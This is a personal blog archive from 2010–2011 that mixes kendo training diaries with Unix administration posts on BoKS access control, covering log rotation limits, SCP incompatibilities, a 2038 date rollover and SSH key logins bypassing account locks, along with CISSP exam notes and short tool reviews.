I usually practice kendo at home once or twice a week, by myself, just stretching and doing suburi. Tonight made a nice difference with one of my sempai visiting for one-on-one training. We did suburi, went over kata #1 and then he let me practice some kihon on him while he was wearing his bogu. Now, I need to remember the learning points we discovered today, because there were quite a few eye openers for me.

Thanks Martijn! I really appreciate your help and I enjoy our training tremendously.  m(__)m


kilala.nl tags: , ,

View or add comments (curr. 2)

Understanding more about our dojo

2011-04-11 22:28:00

Kendo is more than just hitting people with bamboo sticks. It entails strategy, philosophy and psychology. And of course plenty of history! Today I contacted our dojo's founder to start learning about our background. Heeren-sensei quickly told me where Furuya-sensei came from, which is a good enough starting point for me to start finding out more. 

In the mean time I've finally done something I'd been trying to do for a while: find out the elements that make up the name of our dojo to see how the name is composed and what it means.

On the website it says: "Renshinjuku: Training improves spirit and body". Sadly the Japanese name isn't included anywhere on the site except as a graphic at the top, which makes looking up the relevant kanji quite a pain. But with half an hour of puzzling between Wikipedia, WWWJDIC and the iPhone app Kotoba! I managed to get it all together :)

So here we go!

I'd put that together as: "intensive training tempers the heart", or "school where the heart is trained". In this case "heart" is in the sense of the Japanese word 'kokoro', which describes a concept more than one single word. The "kendo" part at the end of course indicates what skills the school focuses on.

Next up? Trying to figure out the correct kanji for Furuya-sensei's name. Is it 古屋? Or is it 古谷? And which one of the nine spellings for "Isao" (his first name) is the correct one? ^_^ Once I've found that out, the real search for our school's background starts :)


kilala.nl tags: , ,

View or add comments (curr. 2)

Kendo kyu exams at Renshinjuku

2011-04-09 21:46:00

Today was an odd day at our dojo in Almere, not because of the examinations, but because of the atmosphere surrounding them. Usually we have a very strict schedule and everyone's pretty serious, but not today. Before the ceremony began there was lots of talking and joking inside the dojo, which by itself is pretty rare. But after the ceremonies were completed and the trainers were deliberating there was a lot of horseplay as well. Very weird, if like me you're used to a stern ambience. 

Anyway, the exam proceedings were cool! The students were lined up in groups, based on which grade they were testing for. First up were the mukyu, those without rank who were going for gokyu, which is a group of eight (myself included). We had to display men uchi, the basic strike for the head, in both the "large" and the "swift" versions. Of course we needed to show proper posture and form, as well as good kiai and fumikomi. The other groups were going for...

The groups for gokyu and yonkyu were also given a short written test, to verify our knowledge of basic kendo terminology and concepts.

In the end we were all allowed to pass our grades, to everybody's pleasure. Our most experienced student Charel also received his official ikkyu ranking, which he was tested for nationally earlier this year.

Personal feedback I received today was:

  1. I am showing clear progress.
  2. My posture in kamae is not nearly threatening enough.
  3. My upswing is cut short when I feel I am in a hurry.

kilala.nl tags: , ,

View or add comments (curr. 6)

SCP troubles: BoKS OpenSSH versus F-Secure

2011-04-06 00:01:00

It is not uncommon for network environments to mix different versions of SSH software, especially when you are still transitioning towards a BoKS-ified network. In such situations you'll often run into little snags that make the seemingly trivial rather impossible. Case in point: SCP (Secure Copy).

Whereas SSH and SFTP are standardized protocols that have been properly documented, SCP isn't so lucky. Sadly there is no such thing as a standard SCP and what "SCP" is depends completely on the SSH software you're using. The Wikipedia page linked above makes a very important point: "The SCP program is a software tool implementing the SCP protocol as a service daemon or client. It is a program to perform secure copying. The SCP server program is typically the same program as the SCP client."

This means that if you're using F-Secure on one side, it is going to expect F-Secure on the other side. If you try to have an OpenSSH client talk SCP to an F-Secure server, then you'll undoubtedly run into errors like these: "scp: FATAL: Executing ssh1 in compatibility mode failed (Check that scp1 is in your PATH)."

What if you're migrating an F-Secure-based environment to BoKS? There are a few possible solutions:

Option #2 is a bit redundant if you're going to be installing BoKS on the hosts later on. You might as well get it over with as soon as possible; you don't have to actively use BoKS from the get-go. Option #3 is a useful enough kludge, especially if there are servers that will never switch to BoKS.
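
By the way, if you're not sure which SSH implementation (and thus which SCP flavor) a remote server speaks, its protocol banner usually tells you. A minimal sketch, assuming netcat is available and port 22 is reachable; the exact vendor strings will differ per product and version:

# Read the SSH identification banner without logging in; OpenSSH and the various
# commercial SSH servers announce themselves differently in this string.
nc -w 3 someserver 22 < /dev/null | head -1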

See also:


kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS: mind your log files!

2011-04-06 00:00:00

BoKS' main log file for transactions is $BOKS_data/LOG. The way BoKS handles this file is configured using the logadm command. Specifically, this is done using two distinct variables: the log file size limit before the LOG file is rotated into the backup directory (the -T value) and the absolute maximum log file size (the -M value).

For example:

$ suexec logadm -V
Log file size limit before backup:       3000 kbytes
Absolute maximum log file size:          100000 kbytes

$ suexec logadm -lv
Primary log directory:                   /var/opt/boksm/data
Backup log directory:                    /var/opt/boksm/archives

What this means is that:

First off, this means that it's not just $BOKS_data that you need to monitor for free space! $BACKUP_dir is equally important because once the -M threshold is reached BoKS will simply stop logging. But then there's something else!
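
A simple check that covers both locations, using the directories from the logadm -lv example above (adjust the paths to your own installation):

# Watch the free space in both the live log directory and the backup directory;
# either one filling up will get you into trouble.
df -k /var/opt/boksm/data /var/opt/boksm/archives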

Did you know that BoKS is hard coded for a maximum of 64 log rotations per day? This is because the naming scheme of the rotated logs is: L$DATE[",#,%,',+,,,-,.,:,=,@A-Z,a-z]$DATE. Once BoKS reaches L$DATEz$DATE it will keep on re-using and overwriting that file because it cannot go any further! This means that you could potentially lose a lot of transaction logging.

The current workaround for this problem is to set your logadm -T value large enough to prevent BoKS from ever reaching the "z" file (the 64th in line). Of course the real fix would be to switch to a different naming scheme that is more flexible and which allows a theoretically unlimited number of log rotations.
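
As a rough sketch of that workaround (I'm assuming the -T flag can be used to set the value it reports with -V; double-check the logadm documentation for your version before applying this):

# Raise the rotation threshold so the LOG file gets rotated far less often,
# keeping the daily rotation count well below the hard-coded limit of 64.
suexec logadm -T 30000
suexec logadm -V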

The real fix has been requested from FoxT and is registered as RFC 081229-160335. This fix has been confirmed as being part of BoKS v6.6.1 (per build 13 I am told).


kilala.nl tags: , ,

View or add comments (curr. 0)

A tough workout today

2011-04-02 21:59:00

Today was a good class. A very good class. 

Let's see... What were the pointers that I need to remember? *ponders* 

I'll also start bringing some sturdy bandaids to class to quickly cover up peeling blisters. This morning I got a big one in a rather annoying spot, which I allowed to distract me too much. A speedy patch job would've helped me mentally. 

Uchikomi geiko was fun though :)


kilala.nl tags: , ,

View or add comments (curr. 3)

Upcoming kendo exam

2011-03-29 07:53:00

All kendoka from our dojo recently received an email from our instructors to partake in the upcoming exam rounds. Seeing how I only started kendo two months ago I asked our sensei about his expectations for us newbies. His reply: "Just take the exam. Like everything in life all beginnings are easy." So there we go :)

Now, seeing how I'm still a mukyu ("no rank") the test will simply be to see if I've been learning properly for the past few months and with any luck I'll be getting closer and closer to the lowest rank there is, rokkyu (sixth rank). The funny thing about the rankings below ikkyu (first rank) is that there are no standardized requirements for them. Starting from ikkyu and proceeding to shodan, nidan and so forth everything has been standardized by the IKF, but below those everyone's free to decide on their own requirements. Thus sometimes you'll have national federations deciding on the conditions (like Germany, South Africa and Australia), often it's a regional thing (like US states) and sometimes it's even decided at the dojo level (like this one from Belgium). Apparently in Japan the kyu grades below ikkyu are only given out to children, with adults not getting anything until they are deemed worthy of ikkyu. As you can see, there are many different approaches to the kyu grades.

Reading through all those descriptions there's a thread that runs through all of them:

We'll see :) I'm looking forward to the ninth of April, simply because it'll be a special day at the dojo. I don't particularly care about the outcome of the exam since I'm not there for achievements/ranking, but to learn kendo.


kilala.nl tags: , ,

View or add comments (curr. 0)

A smaller kendo class

2011-03-28 07:45:00

This weekend's kendo class was a bit... weird, I guess. The group was very small, with only five people in bogu, with us four newbies in dogi or sweats and without our usual sensei. It was a productive and tiring class, but it seemed to lack coherence and rigour. We'll do better next time! ^_^

One big thing I took away from this lesson: posture.

Posture, posture, posture. Fukushou Hillen and Kris kept reminding me that I keep ducking, or bending backwards. Later on sempai Jeroen also noticed that I don't fully raise my shinai when striking, meaning that my left fist doesn't pass my face completely. Jeroen also immediately noticed something I'd been slightly aware of: when doing fumikomi I tend to keep my right foot very close to myself instead of really lunging forward. On the one hand this severely limits my range, on the other it ruins my fumikomi and my follow-through because I'm stomping my heel, instead of slapping my foot.

We were also informed that the 9th of April will be the next round of exams. I don't really know what sensei expects of us newbs who haven't even attained rokkyu yet, so I've fired off an email to him :)

Aside from the usual practice in the dojo I also try to get practice in at home. I run 2km two or three times a week, train my lower arms with a Powerball I got years ago and I do suburi once or twice a week as well. Fun times! One very odd thing though: while I can run 1km without much trouble, the okuri-ashi warmups in the dojo really wear me out. Roughly 100m of sliding footwork at a rapid pace affects me more than 1km of jogging with intervals of running. Interesting ^_^;


kilala.nl tags: , ,

View or add comments (curr. 2)

Spirit and endurance: two things I need

2011-03-20 07:46:00

Yesterday's kendo class was great! In sensei Ton's absence fukushou Kris and Hillen took the lead with many basic exercises for everyone, followed by half an hour of serious sparring. 

The biggest things that stood out for me were not about technique, but all mental:

The first point is obvious: after the first 1.5 hours of training I was already quite tired. Going up against my seniors, many of them managed to fire me up with comments and kiai, forcing me to show spirit again. Obviously I'll need to be able to do that without their aid.

The second point was driven home when Hillen gave me the lead of a group exercise, where I was to sound off stepping directions. From my mannerisms he could read what my command was going to be before I called it out. Doh! That's called over-thinking on my side :)

After the training I felt absolutely great, which lasted for a few hours more. But when I'd taken a short nap in the afternoon I woke up with a headache that was something fierce! =_= Skipped dinner and went to bed at 1930.


kilala.nl tags: , ,

View or add comments (curr. 2)

Fifth kendo training

2011-03-12 15:20:00

Whew! Today's kendo training was heavy!

While the whole two hours were spent on suburi ("empty strikes", that is individual practice as opposed to one-on-one training) it was very tiring for me. It was the first time for me to wear my hakama and gi in the dojo, which was interesting to say the least. The hakama was very comfortable, but I wasn't fully prepared for how warm the thick, cotton gi would get. Until now I've been wearing sweatpants and a longsleeve, which is a lot cooler. But now I was pooped within the first half hour :)

Aside from that, lessons learnt:

What a great class today. I was about ready to give up for a five minute break a few times, but I kept on going. Get a quick drink and catch my breath, then carry on immediately! 


kilala.nl tags: , ,

View or add comments (curr. 2)

Hooray for my sewing machine

2011-03-08 22:33:00

After getting my kendo uniform exchanged the fit was a lot better. The size 185 really was way too big for my 179 frame, but oddly even the size 180 was still too big. So out comes my trusty Pfaff! I spent the better part of last night measuring the legs of my hakama to the right length and then hemming them, followed by a re-ironing of the pleats. Now the fit is even better and I got to work with my hands again. And it sure beats paying a seamstress to do it for me!

I also had some time left, so I took the Ikea manga drapes down from my office wall and made a Godzilla tenugui for myself. Handy and good looking! :)


kilala.nl tags: , ,

View or add comments (curr. 1)

Finally, more kendo training

2011-02-27 11:24:00

After two missed trainings (illness and our Copenhagen trip) I finally went back to class yesterday. The effects of three weeks without proper training were very clear, because I was quite lost in my timing. I had to relearn all manner of things.

On the positive side of things, my striking motion has in fact improved since last time. About two weeks ago it finally "clicked" in my head. The reason why my strike was moving in an arc instead of a straighter line was because I was flicking my left wrist right from the start. Instead, what I have to do is first pull my left hand in a straight line, with the flick and the swing coming in much later. 

So... Stuff to focus on:

The stupid thing is that I keep getting the various suburi mixed up with regard to when to raise and when to strike, in relation to my footwork. Of course it's simply a matter of repetition to ensure that I memorize it. I think I'd better clean up the back yard a bit to provide the required space for my practice. There's only so much I can do in my study. 


kilala.nl tags: , ,

View or add comments (curr. 3)

Endorsement: I'd recommend Kendo 24

2011-02-21 21:24:00

Earlier I wrote a little about my shopping experience with Kendo 24. I'd like to take a little bit of time to write an actual endorsement, because their customer service is absolutely great. 

When I placed my first order I dillydallied a little bit about the size of my uniform. In the end I picked a size which I knew was slightly too big, assuming that it'd be easy to fix if it was -way- too big. Bernd was friendly and patient with me and promptly sent out my order. And when it did turn out that the uniform was waaay too big he had no problems at all with sending me a new uniform (with free shipping!) even before I'd returned my original order. At their prices, the cost-quality ratio is just perfect for a beginner. My next order will definitely be with them again. 


kilala.nl tags: ,

View or add comments (curr. 0)

Oww, pulled muscle's cramping my style

2011-02-05 20:13:00

Last week's training was great and I enjoyed it a lot. The day after I realized that I might have enjoyed it just a little bit too much, because apparently I'd pulled a muscle in my left leg. Something running from my groin down the inside of my thigh. Either way, dumb me disregarded the problems and proceeded to attempt jogging to and from the office every day. Dumb :) Today it was still bothering me, to the point that I had to bow out twice, after sharp pains during practice. So, mental note to self: take it easy next week!

Both sensei Loyer and sempai Chris pointed out a few structural flaws in my technique, which I really need to work on. One has been obvious from the start, one was noticed only now. 

Another important point is that, when landing a point, I should properly stamp my right foot. However, today I avoided doing that because of my pulled muscle.

So! Practice, practice! Renshuu, renshuu!

Today I also asked the teacher if I could enroll as a student. I was originally told that everyone could have five free introductory weeks, after which one'd join the dojo. Instead I was told that he would, for now, not accept my enrollment and that I should simply proceed as we are right now. Sensei wanted to impress upon me that "kendo is not something you do for a year", so first he'd like to see me get through the first few months. Based on our short discussion I assume this is to our mutual benefit: for me so I am not forced to make social and monetary commitments and for the dojo so they first get to know me better before truly accepting me. It's certainly not what I expected, but I can agree with all the benefits involved with this approach. 

Finally, as I remarked last week: I really like the people in the group. At least one of them lives very close to me, so I gave him and his friend a ride back to Almere Buiten station. Given our proximity I see some definite opportunities for backyard training in spring and summer :)


kilala.nl tags: , , ,

View or add comments (curr. 2)

My basic kendo gear has been ordered

2011-01-30 19:48:00

The graphic to the left is used on the Kendo24 website, to advertise their equipment sets for beginners. I can't help but giggle ^_^

Anyway... A hundred euros (or 114 including shipping) gets me everything I'll need for my first few months of kendo training. A hakama (special pants), a gi (jacket), a shinai (bamboo dueling sword) and a bokken (wooden sword for kata). Oh, and a baggie to put the swords in. That's a pretty good deal, though obviously none of it will be of stellar quality. Still, a hundred bob is certainly manageable as a starting point! 

Next up, I know it's not required and might be a bit weird, I'll write a short letter requesting our sensei to accept me as a student.


kilala.nl tags: , ,

View or add comments (curr. 2)

Second day of kendo at Renshinjuku

2011-01-29 18:58:00

All the running I've been doing the past year sure came in handy today! Aside from the usual stretching and jumping, today's warming-up also consisted of multiple laps around the gymnasium. Roughly 700m of running, sprinting, strafing and of course the kendo shuffles (forwards, reverse and sideways) would've certainly done me in two years ago but not now! :D

Speaking of the warming-up: aside from the fact that it's very useful, there is also something very cool about it. The last part consists of various jumps, jumping jacks and stomped landings, combined with counting. It really builds my fighting spirit (if you will) to have a gym filled with the roars of ichi-ni-SAN!, timed to the jump-jump-THUMP! of twenty people. Like there's a giant bass drum in the room... ^_^

Anyway. I learnt a lot today. I still have the same problem as last week, where I strike with my whole arm instead of whipping the shinai with my left wrist. Aside from that I also tend to stoop a little, holding the shinai too low (below navel level). And there's one problem that's obvious for someone completely new to martial arts: I am hesitant to actually strike someone. Today we practiced the basic men strike and the kote-men strikes and only near the end of class would I actually start HITTING people, instead of just tapping or glancing. 

All my sempai were very helpful and patient, with most everyone having a pointer or two. I enjoy training with this group a lot!

EDIT:

At least there's nothing wrong with my kiai. Finally my big lung capacity pays off and I can use my Voice Of Authority(tm) for something else, besides addressing crowds at the 'Anime 200x' festivals. 


kilala.nl tags: , ,

View or add comments (curr. 1)

Tried a new sport today: kendo

2011-01-22 14:35:00

(C) H. Hofer, 2005

Today I did something new: I partook in kendo training. 

Recently I've been getting the "itch" to pick up sports again. I've been running between the office and the railway station every day, trying to build up some stamina again. This is going slowly, but it's working. But as I learnt last summer, I doubt that I'd want to go back to long endurance running again. Well, as Menno so succinctly pointed out: "there's never a dull moment in kendo!"

The way I see it, kendo will be beneficial to me in a number of areas. Obviously it's good exercise, there's no doubt about that. It will hopefully also teach me some mental endurance and some much-needed humility. Personally I love the rigor, the tradition and the ceremony, so that's a plus. And physically? I can only dream of ever becoming as fast as some of these folks! One fellow I practiced with would be able to get in five to seven blows for every one of mine. The light footedness! Amazing!

There is one snag though. If I ever want to progress beyond the mere basics, wear a bogu and actually start fighting, then I will need to get over myself and start wearing contact lenses. There is no way that my normal glasses will stand up to the blows. So either I purchase expensive, custom sports glasses, or I get my eyes lasered, or I get contacts. Seeing how contacts are the cheapest and least permanent option it's safest to go with that for now. 

The dojo in Almere, Renshinjuku, is an offshoot of a larger dojo in Amstelveen. There aren't that many kendo dojo in the Netherlands, but I appear to have lucked out with this one! For my taste the dojo has the right level of formality. I was dreading a group similar to my original archery group in Zutphen: no discipline, no rigor, just teenagers running wild. Luckily that is not the case at all! In the dressing room the atmosphere is jovial and informal, but once you go out to the training floor everybody gets serious.

I am really looking forward to next week's class.


kilala.nl tags: , ,

View or add comments (curr. 5)

AWW YEAH! I passed my CISSP exam!

2010-12-14 21:29:00

Aw yea!

Tonight, after weeks of waiting and finally getting fed up with it all, I finally got the liberating email from ISC2:

"Dear Thomas Sluyter:

Congratulations! We are pleased to inform you that you have passed the Certified Information Systems Security Professional (CISSP®) examination - the first step in becoming certified as a CISSP."

As predicted they never mention anything about my passing grade, but I made it. The six months of studying and cramming paid off! Also congratulations to my work buddy Patryck, who's also passed. Both of us, on our first try. /o/

Image blatantly ripped from Super Effective, which is awesome ^_^


kilala.nl tags: , , ,

View or add comments (curr. 7)

Finally! I've taken my CISSP exam

2010-11-14 07:40:00

A large room of people

It has been a very long time in coming, but yesterday I finally took my CISSP exam. I started preparing for my exam five months ago by reading the big 1200-page study guide from cover to cover. I followed online classes and went to a week-long review class. I also took a few practice exams, both the ones included with the Harris book as well as those at CCCure.org. And finally, in the last week before the exam I read through an excellent CISSP summary, written by my colleague Maarten de Frankrijker (awesome work Maarten!).

All in all I felt pretty well prepared for the exam.

Yesterday I left home at seven and because I arrived at the exam site 1.5 hours early I quickly went to the market in nearby Nieuwegein to pick up some stuff and have a chat with old acquaintances. I arrived back at the exam site half an hour early, at 0830. While other people were still rifling through their study guides and summaries, I instead opted to simply read "The League of Extraordinary Gentlemen" ^_^ I mean, if you don't know the materials an hour before the exam, all the cramming in the world isn't going to help you :)

We started the exam at 1005 and I finished at 1310, so it took me almost exactly three hours including breaks. My strategy for the test? I divided the 250 questions into ten blocks of 25. For each block I answered the questions in the booklet, did a quick double check and then copied the answers to the answer sheet. I then took a one-minute break, stretching, yawning and having a drink, after which it was back to the next block of questions. After a hundred questions (so twice in the exam) I took a longer break, to walk around a little, to do some more stretching, to have a sandwich, etc. All in all, I made sure to remain relaxed at all times, assuming that pressure would only make me screw up questions.

Could I have used more time? Sure. Could I have gone over all 250 questions to see if I had made any mistakes? Sure. But I didn't. I felt right about the majority of questions I'd answered and figured that, if I -did- make any mistakes, I'd play the numbers game. How many questions would I have accidentally answered incorrectly? I feel that the chance is small. So, I was the first one to finish the exam and walk out of there. 

I'm very curious what the results will be! Unfortunately it'll take a while for the results to come in, a few weeks I'm told. 


kilala.nl tags: , ,

View or add comments (curr. 10)

Reinstalling the Macbook

2010-11-08 23:59:00

Well this doesn't happen very often: I've been forced to re-install my Macbook after two years of trusty service. The laptop was still functioning normally, but had begun to show glitches in file saving dialogs. A quick check with Disk Utility showed that there was corruption in the file system's inode table and that (sadly) a format and restore were needed. 

Took me four hours in total to run a full backup, then perform a clean install, then return all my files to their original locations. Not too shabby, but I would've preferred to spend those four hours programming. Oh well...


kilala.nl tags: , ,

View or add comments (curr. 0)

Two nice tools for my daily workflow

2010-10-24 09:42:00

Evernote + EgretList

A month or so ago I started using Evernote, which could be described as a digital scrapbook-meets-notebook-meets-filestorage. The application and its basic use are free and available cross-platform, with a very nice web interface and client software for Mac OS X, Windows, iPhone OS, Blackberry and a few others. Anything that you add to your Evernote storage gets synchronized to all of your devices automatically. This means that the notes I took during my CISSP class were synced to my iPhone and that the web clippings I made at home can also be read online. And so on. It really is a nice service and there's no beating the price!

Evernote also have a paid service, which adds extra functionality to your account. Your file storage space gets increased, the search function indexes any PDFs you store and your mobile Evernote client will be able to store all of your notebooks locally (instead of accessing them through Wifi or 3G). At $45 a year I wouldn't say the value's bad. So far Evernote's been very, very helpful to me.

Helpful how? Well, currently I have two distinct workflows I rely on heavily. On the one hand there's my studies for my CISSP exam and my security research. On the other hand there's my preparations for the BoKS course I will be teaching in a week. Since Evernote allows me to create multiple scrapbooks, it's a cinch to grab any Wiki pages I like, as well as any security PDFs and store them together with my CISSP class notes and my ToDo list. Similarly, for the training I have an easy ToDo list, many notes from teleconf phone calls and suggestions for new exam questions. All neatly taggable, searchable and editable. 

Speaking of ToDo lists: I have combined my Evernote account with the stunningly beautiful EgretList iPhone app. EgretList logs into your Evernote account and searches all your notes for any and all (un)finished ToDo items. These ToDo items are sorted by their Evernote categories and notebooks and presented as a faux Moleskine notebook. So instead of having to search through many different Evernote notes to check/uncheck a ToDo item, you can easily do it through EgretList. Lovely :)


kilala.nl tags: , , ,

View or add comments (curr. 3)

Holy crap Apple! Way to up the bar!

2010-10-20 20:48:00

The new Macbook Air

Wow. Just, wow. 

Tonight Steve Jobs got on stage and, among many other nice things, announced the new Macbook Air range for 2010. I was going "Nice, nice..." while he was going down the spec list, then I went "WHOA HOLY SH!T!!!" when he announced the price point: $999 for the base model which has an 11.6" screen and weighs in at -literally- one kilogram. 

Yeah. The next business laptop I'm getting? It's -that- one. If I ever need on-the-road virtualization I'll just run the VMs at home and access them through remote desktop.

EDIT:

Ah! And here is the iFixit tear-down of the new MBA.


kilala.nl tags: , ,

View or add comments (curr. 7)

How to slow down your file copies

2010-10-19 22:49:00

While preparing for a course I will be teaching in two weeks time I need to set up some virtual machines for the practice labs. All of these run on Sun's VirtualBox and FoxT has provided me with a USB disk filled with the appropriate disk images. I bought two extra USB drives, so we could set up the students' computers faster (three drives instead of one to pass around the files). 

But that's where the crap starts. You see, if I'm not mistaken all the students will use Windows boxen. I have a Mac. All the virtual machine disk images are big, between 10GB and 22GB. 

Now, the only file system that is 100% read+write out of the box between Windows and Mac OS X is the aged FAT32. And no, FAT32 does not support any files over 4GB in size. Crap :(
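
For reference, here's a quick way to spot the files that will refuse to copy onto FAT32 (the mount point is just an example):

# List every file larger than FAT32's per-file limit of 4 GiB minus one byte.
find /Volumes/FOXT_USB -type f -size +4294967295c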

This means that:

  1. I have formatted my extra USB drives as NTFS, using Windows XP running in a Parallels virtual machine.
  2. I have installed MacFUSE and NTFS-3G on my Mac, to enable it to write to NTFS.
  3. I am now copying 200GB of disk images from one USB drive to the other.

Because USB is CPU-bound and because the NTFS-3G driver is experimental this ordeal constantly takes up 27% of my 200% CPU time (dual core) and the actual copy will take roughly four hours. Damn!

I think I'll quit the copy and be more selective about the disk images that I copy. :) 


kilala.nl tags: , , ,

View or add comments (curr. 0)

From the rumor mill: features for BoKS 6.x and 7.x

2010-09-16 00:00:00

A few weeks ago we met with two of FoxT's VPs who'd come over from the US to Amsterdam. During our two hour meeting we were told of many awesome features to be expected in future versions of BoKS (or "FoxT Access Control" :) ).

The future looks bright! I for one can't wait to get my hands on 6.6.x to start testing and learning! :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Security problems: password entropy versus reuse

2010-09-14 22:24:00

An interesting security conversation

Comic continues here

As a security guy this comic makes 100% sense and it is in fact a very likely scenario. It is also the one reason why we (Marli and I) never use the same password twice, either between accounts or when rotating them semi-frequently.


kilala.nl tags: , ,

View or add comments (curr. 0)

I spent a week in boot camp

2010-09-10 22:43:00

CISSP course books

You may recall that I started studying for my CISSP certification sometime in June. Since then I spent two months reading the 1200-page course book cover-to-cover, learning a lot of new things about the field of IT security. It was a chore getting through the book, but it's been very educational!

Last week I finally finished the last chapter, just in time for this week's "boot camp". Instead of using the five days of class to learn things from scratch, I came prepared and only used the class to pinpoint any weak points in my knowledge and experience. Five days, forty hours of dry theory and many discussions later I now have a list of roughly 50 "TODO" items to tend to before my examination.

The exam is slated for the 13th of November and will take all of six hours. I'm actually a bit afraid that the remaining two months will be too long for me. I'll need a few weeks to kill all the "TODO" items, which will then leave me with a few more weeks before the exam. I could keep on cramming, I could get started on my next certs/studies, I could get some programming done, or I could simply unwind. I don't know... I'm afraid of letting all the info I've gathered slip from my head either way.


kilala.nl tags: , ,

View or add comments (curr. 0)

What's in a name? FoxT product renaming

2010-08-31 00:00:00

Over the past fifteen years the product we've come to know and love has changed names on numerous occasions. BoKS has changed hands a few times and with each move came a new name. All of this has led to a rather muddled position in the market, with many people confused about what to call the software.

Is it "BoKS"? Is it "FoxT Access Control", or "Keon", or even "UnixControl"? And is the company called FoxT or is it Fox Technologies?! And this confusion isn't alleviated by the fact that both resumés and job postings refer to the software by any of these names.

Now we are told that FoxT are seriously considering a rigorous change to their naming convention, one that they will stick with for the coming years. All we can say is that it'd better be good! Because most of the names tossed about so far have both up and downsides.

Things like Access Control, Unix Control, or Server Control all have the problem that they are names consisting of two very generic words. Run them through Google and you'll get oodles of results. Words like FoxT and BoKS are certainly far from generic, but even those give pretty bad results in Google ("Did you mean books?"). BoKS is certainly a memorable term and most people still refer to the software that way, even though neither the FoxT documentation nor the FoxT website still mentions the name.

So far the only past name that ticks all the boxes (unique, memorable, great with SEO) is "Keon". But unfortunately that can't be used, because the name is still owned by RSA. :(

So, what do you think?! Any suggestions with regards to a new product name? Any emotional attachment to the name "BoKS" (I'll admit to having that flaw)? Pipe in and let us know!


kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS and the epoch rollover

2010-08-20 00:00:00

 

The year 2038 is still a long time away, but we may already be feeling its effects!

As any Unix administrator will know, Unix systems count their time and date as the number of seconds passed since "Epoch" (01/01/1970). On 32-bit architectures this means that we're bound to "run out of time" on the 19th of January of 2038, because after that the Unix clock will roll over from 01111111.11111111.11111111.11111111 to 10000000.00000000.00000000.00000000.

While you might not expect it, BoKS administrators may already be feeling the effects of the Year 2038 problem way ahead of time.

One commonly used trick for application user accounts is to set their "pswvalidtime" to a very large number. This means that the user account in question will never be bugged to change its password, which tends to keep application support people happy. The account will never be locked automatically because someone forgot to change the password, and thus their applications will not crash unexpectedly.

It's common to use the figure "9999" as this huge number for "pswvalidtime". That roughly corresponds to 27.3 years. Do the rough math: 2010.8 + 27.3 = 2038.1. Combine that with the "pswgracetime" setting and BINGO! The password validity for the user in question has now rolled over to some day in January of 1970! The odd thing is that the BoKS "lsbks" command will not show this fact, but instead translates the date to the corresponding date in 2038, which throws you off the track of the real problem.

So... If you happen to rely on huge "pswvalidtime" settings, you'd better tone it down a little bit. Thanks to the guys at FoxT for quickly pinpointing our "problem". It seems that there's a 9999-epidemic going round :)
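
If you want to sanity-check a given "pswvalidtime" yourself, the arithmetic is easy to script. A minimal sketch in plain shell plus GNU awk (this is not a BoKS command, and 9999 is just the example value from above):

DAYS=9999
gawk -v days="$DAYS" 'BEGIN {
  expiry = systime() + days * 86400     # now, plus pswvalidtime in seconds
  limit  = 2147483647                   # max signed 32-bit time_t: 2038-01-19
  if (expiry > limit)
    printf("A pswvalidtime of %d days rolls the 32-bit clock over past 2038-01-19\n", days)
  else
    printf("A pswvalidtime of %d days expires safely on %s\n", days, strftime("%Y-%m-%d", expiry))
}'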

EDIT: Thank you to Wilfrid for pointing out two small mistakes :)

 


kilala.nl tags: , ,

View or add comments (curr. 0)

In BoKS, "locked" does not always mean an account is locked

2010-07-28 21:37:00

I ran into a rather interesting case the other day, pointing me to another caveat that you need to keep in mind with BoKS. Let me say up front that I understand FoxT's design decision in this case and that, while I don't necessarily agree with them, it isn't a very big problem as long as you know the situation exists. So, what's up?

In BoKS, a "locked" account is not always locked the way you might think it is.


How I found out that "locked" isn't always "locked"

I received a trouble ticket from a friend/colleague of mine, saying that he suspects his application user got locked. He couldn't SU to the user account anymore, getting a message saying it was locked. Either way, his password wasn't getting accepted and he needed to get in!

So, I checked the application user and it was fine! Not locked, no expired password, no problems at all. However, the BoKS logs did show that my friend's account was in fact blocked! Browsing back through the transaction logs I found that his personal account had been locked after he'd entered a wrong password while SU-ing. In the world of BoKS this makes sense: you try to guess your way into another account with SU and your own account gets locked as a punishment. This way you can block the perpetrator, while preventing a DoS (Denial of Service) on the target account.

07/07/10 17:05:50 SERVER-A pts/2 bobby sshd Successful login (ssh shell from 10.72.2.3)
07/07/10 17:05:58 SERVER-A pts/2 bobby su Successful SU from user bobby to oracle
07/08/10 03:48:30 SERVER-A pts/2 bobby sshd Logout
07/08/10 11:02:35 SERVER-B - bobby sshd Bad login (ssh auth from 10.72.2.3). Wrong password.
07/08/10 15:05:13 SERVER-C - bobby sshd Bad login (ssh auth from 10.72.2.3). Authentication failed.
07/08/10 15:05:16 SERVER-C - bobby sshd Bad login (ssh auth from 10.72.2.3). Wrong password.
07/08/10 15:05:19 SERVER-C - bobby sshd Bad login (ssh auth from 10.72.2.3). Wrong password.
07/08/10 15:05:26 SERVER-C - bobby servc Too many failed login retries on SERVER-C
07/08/10 15:05:26 SERVER-C - bobby sshd Bad login (ssh auth from 10.72.2.3). Wrong password.
07/08/10 15:05:30 SERVER-C - bobby sshd Bad login (ssh auth from 10.72.2.3). Too many erroneous login attempts.
07/13/10 08:22:47 SERVER-B pts/1 bobby sshd Successful login (ssh shell from 10.72.2.3)
07/13/10 11:14:15 SERVER-B pts/1 bobby su Access denied by server 10.72.2.3, route SU:bobby@pts/1->oracle@SERVER-B
07/13/10 11:14:15 SERVER-B pts/1 bobby su Bad SU from user bobby to oracle (Too many erroneous login attempts.)
07/14/10 15:52:34 SERVER-B pts/1 bobby sshd Logout
07/15/10 08:12:49 SERVER-B pts/1 bobby sshd Successful login (ssh shell from 10.72.2.3)
07/15/10 10:24:50 SERVER-B pts/2 bobby sshd Successful login (ssh shell from 10.72.2.3)

In the case above, "bobby" locked his account by repeatedly botching his own password on a system where he hadn't installed his SSH keys yet.
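
As an aside: with a chunk of transaction log like the one above saved to a text file, a one-liner is enough to list which accounts tripped the retry limit and where. A minimal sketch (the log file path is hypothetical; the field positions match the format shown above):

# user is field 5, host is field 3, date/time are fields 1 and 2
grep "Too many failed login retries" /tmp/boks_translog.txt | awk '{ print $5, "locked on", $3, "at", $1, $2 }' | sort -u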

So how come my colleague could still login using SSH? Didn't BoKS say his user account was blocked?!


Design decision: SSH key authentication ignores "locked" status

I was flabbergasted! Bobby's account had gotten locked, so certainly he should not be allowed to login anymore, right? Besides, he was getting blocked on his SU and SUEXEC usage! So why could he still login?

